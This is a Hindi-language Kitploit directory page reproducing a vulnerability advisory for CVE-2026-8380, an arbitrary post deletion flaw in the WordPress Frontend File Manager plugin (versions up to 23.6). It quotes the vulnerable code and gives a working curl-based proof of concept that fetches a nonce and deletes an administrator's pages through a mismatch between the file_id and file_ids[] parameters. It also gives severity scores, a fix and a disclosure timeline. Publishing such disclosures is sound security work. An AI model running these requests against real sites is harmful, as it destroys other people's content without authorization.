Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/tiagob0b/cve-2026-8380
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubtiagob0b/cve-2026-8380

CVE-2026-8380

CVE-2026-8380

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-8380

CVE-2026-8380 — फ्रंटएंड फ़ाइल मैनेजर <= 23.6 में मनमाना पोस्ट विलोपन

अवलोकन

वर्डप्रेस प्लगइन Frontend File Manager (nmedia-user-file-uploader) के संस्करण <= 23.6 में एक गंभीर प्राधिकरण दोष पाया गया।

इस कमजोरी के कारण, प्रमाणित उपयोगकर्ता कम विशेषाधिकारों के साथ AJAX विलोपन एंडपॉइंट में अनुचित प्राधिकरण सत्यापन के कारण मनमाने ढंग से वर्डप्रेस पोस्ट, पेज, अटैचमेंट और कस्टम पोस्ट प्रकारों को स्थायी रूप से हटा सकते हैं।

जब प्लगइन विकल्प _allow_guest_upload=yes सक्षम होता है, तो यह कमजोरी अप्रमाणित हमलावरों द्वारा शोषणीय हो जाती है।

  • CVE: CVE-2026-8380
  • प्लगइन: Frontend File Manager (nmedia-user-file-uploader)
  • प्रभावित संस्करण: <= 23.6
  • शोधकर्ता: Tiago Ferreira
  • CWE: CWE-639 / CWE-862
  • भेद्यता प्रकार: मनमाना पोस्ट विलोपन
  • WPScan: https://wpscan.com/vulnerability/45fcbf74-45be-4cff-a81a-0fea903592a5/

कार्यकारी सारांश

प्लगइन में एक गंभीर प्राधिकरण बाईपास भेद्यता है जो wpfm_delete_file AJAX एक्शन के अंदर पैरामीटर बेमेल सत्यापन के माध्यम से वर्डप्रेस सामग्री को मनमाने ढंग से हटाने की अनुमति देती है।

इस भेद्यता को एक नियंत्रित प्रयोगशाला वातावरण में सक्रिय प्रूफ-ऑफ-कॉन्सेप्ट शोषण के साथ सफलतापूर्वक मान्य किया गया।

शोध के दौरान अतिरिक्त सुरक्षा कमजोरियाँ भी पाई गईं:

  • मेटाडेटा अपडेट एंडपॉइंट में बिना नॉन्स सत्यापन के CSRF
  • केवल अंतिम फ़ाइल एक्सटेंशन के आधार पर एक्सटेंशन अनुमति सूची को बायपास
  • _allow_guest_upload कई एंडपॉइंट में प्राधिकरण जाँच को अक्षम करना
  • केवल REMOTE_ADDR पर आधारित दर सीमित करना

संवेदनशील एंडपॉइंट

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=wpfm_delete_file

प्रभावित फ़ाइल

root@kitploit:~
inc/files.php

संवेदनशील कोड क्षेत्र

root@kitploit:~
// inc/files.php:691
if( !$allow_guest && ! wpfm_is_current_user_post_author($_POST['file_id'] )) {
    wp_send_json_error(__("Sorry, not allowed", "wpfm"));
}

// inc/files.php:695
$file_ids = isset($_POST['file_ids']) && is_array($_POST['file_ids'])
            ? array_map('intval', $_POST['file_ids']) : [];

foreach ($file_ids as $file_id) {
    $file = new WPFM_File($file_id);

    wp_delete_post($file_id, $bypass_trash);
}

मूल कारण

प्राधिकरण जाँच एकवचन पैरामीटर का उपयोग करके स्वामित्व को मान्य करती है:

root@kitploit:~
$_POST['file_id']

हालाँकि, वास्तविक विलोपन संक्रिया एक भिन्न पैरामीटर पर पुनरावृत्त होती है:

root@kitploit:~
$_POST['file_ids[]']

इस बेमेल के कारण, एक हमलावर यह कर सकता है:

  1. file_id में एक वैध स्वामित्व वाली पोस्ट प्रदान करें
  2. file_ids[] में पीड़ित के मनमाने पोस्ट ID इंजेक्ट करें

यह सुनिश्चित करने के लिए कोई सत्यापन मौजूद नहीं है:

  • file_ids[] में प्रत्येक आइटम का स्वामित्व
  • अनुमत post_type
  • file_id और file_ids[] के बीच संबंध

परिणामस्वरूप, मनमानी वर्डप्रेस सामग्री को स्थायी रूप से हटाया जा सकता है।


प्रभाव

न्यूनतम विशेषाधिकारों वाला एक प्रमाणित उपयोगकर्ता स्थायी रूप से हटा सकता है:

  • पोस्ट
  • पेज
  • उत्पाद
  • अटैचमेंट
  • कस्टम पोस्ट प्रकार
  • प्लगइन-विशिष्ट सामग्री

विलोपन इसके साथ किया जाता है:

root@kitploit:~
wp_delete_post($file_id, true);

अर्थात् सामग्री को कूड़ेदान (Trash) से पुनर्प्राप्ति के बिना स्थायी रूप से हटा दिया जाता है।

यदि _allow_guest_upload=yes सक्षम है:

  • शोषण अप्रमाणित हो जाता है
  • लेखक स्वामित्व जाँच पूरी तरह से छोड़ दी जाती है

प्रूफ ऑफ कॉन्सेप्ट

प्रयोगशाला वातावरण

  • लक्ष्य: 192.168.1.1:8080
  • हमलावर भूमिका: सब्सक्राइबर
  • पीड़ित भूमिका: प्रशासक

हमलावर खाता

root@kitploit:~
wpfm_sub : Sub@Test123

पीड़ित पोस्ट

root@kitploit:~
पेज ID: 60
पोस्ट ID: 61

चरण 1 — नॉन्स प्राप्त करें

हमलावर शॉर्टकोड वाले पेज पर जाता है:

root@kitploit:~
[ffmwp]

नॉन्स निकालें:

root@kitploit:~
curl -b sub_cookie http://target/wpfm-test/ | grep wpfm_ajax_nonce

प्रतिक्रिया:

root@kitploit:~
value="9c233d4720"

चरण 2 — मनमाना विलोपन ट्रिगर करें

root@kitploit:~
curl -b sub_cookie -X POST http://target/wp-admin/admin-ajax.php \
    --data 'action=wpfm_delete_file' \
    --data 'wpfm_ajax_nonce=9c233d4720' \
    --data 'file_id=57' \
    --data 'file_ids[]=60' \
    --data 'file_ids[]=61'

स्पष्टीकरण

पैरामीटरविवरण
file_id=57प्राधिकरण बायपास करने के लिए उपयोग की गई सब्सक्राइबर-स्वामित्व वाली पोस्ट
file_ids[]=60पीड़ित प्रशासक पेज
file_ids[]=61पीड़ित प्रशासक पोस्ट

सफल प्रतिक्रिया

root@kitploit:~
{
  "success": true,
  "data": {
    "message": "2 files, directories are removed inside SUB-OWNED"
  }
}

सत्यापन

root@kitploit:~
curl -o /dev/null -w "%{http_code}\n" \
http://target/wp-json/wp/v2/pages/60
root@kitploit:~
404
root@kitploit:~
curl -o /dev/null -w "%{http_code}\n" \
http://target/wp-json/wp/v2/posts/61
root@kitploit:~
404

गंभीरता

प्रमाणित परिदृश्य

CVSS 3.1

root@kitploit:~
8.1 उच्च
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

अतिथि अपलोड सक्षम परिदृश्य

CVSS 3.1

root@kitploit:~
9.1 गंभीर
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

CWE वर्गीकरण

  • CWE-639 — उपयोगकर्ता-नियंत्रित कुंजी के माध्यम से प्राधिकरण बायपास
  • CWE-862 — लुप्त प्राधिकरण

अनुशंसित समाधान

file_ids[] के अंदर प्रत्येक प्रविष्टि के लिए स्वामित्व और पोस्ट प्रकार को मान्य करें।

सुरक्षित कार्यान्वयन का उदाहरण:

root@kitploit:~
foreach ($file_ids as $fid) {

    if ( ! wpfm_is_current_user_post_author($fid) ) {
        wp_send_json_error(...);
    }

    if ( get_post_type($fid) !== 'wpfm-files' ) {
        wp_send_json_error(...);
    }
}

समयरेखा

घटनातारीख
भेद्यता की खोज2026-05-28
विक्रेता से संपर्क2026-05-28
WPScan प्रकाशित2026-06-04
सार्वजनिक प्रकटीकरण2026-06-18

संदर्भ

  • WPScan सलाह: https://wpscan.com/vulnerability/45fcbf74-45be-4cff-a81a-0fea903592a5/

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-8380


अस्वीकरण

यह शोध केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए एक नियंत्रित प्रयोगशाला वातावरण में किया गया था।

उचित प्राधिकरण के बिना सिस्टम का परीक्षण न करें।

टूल डाउनलोड करें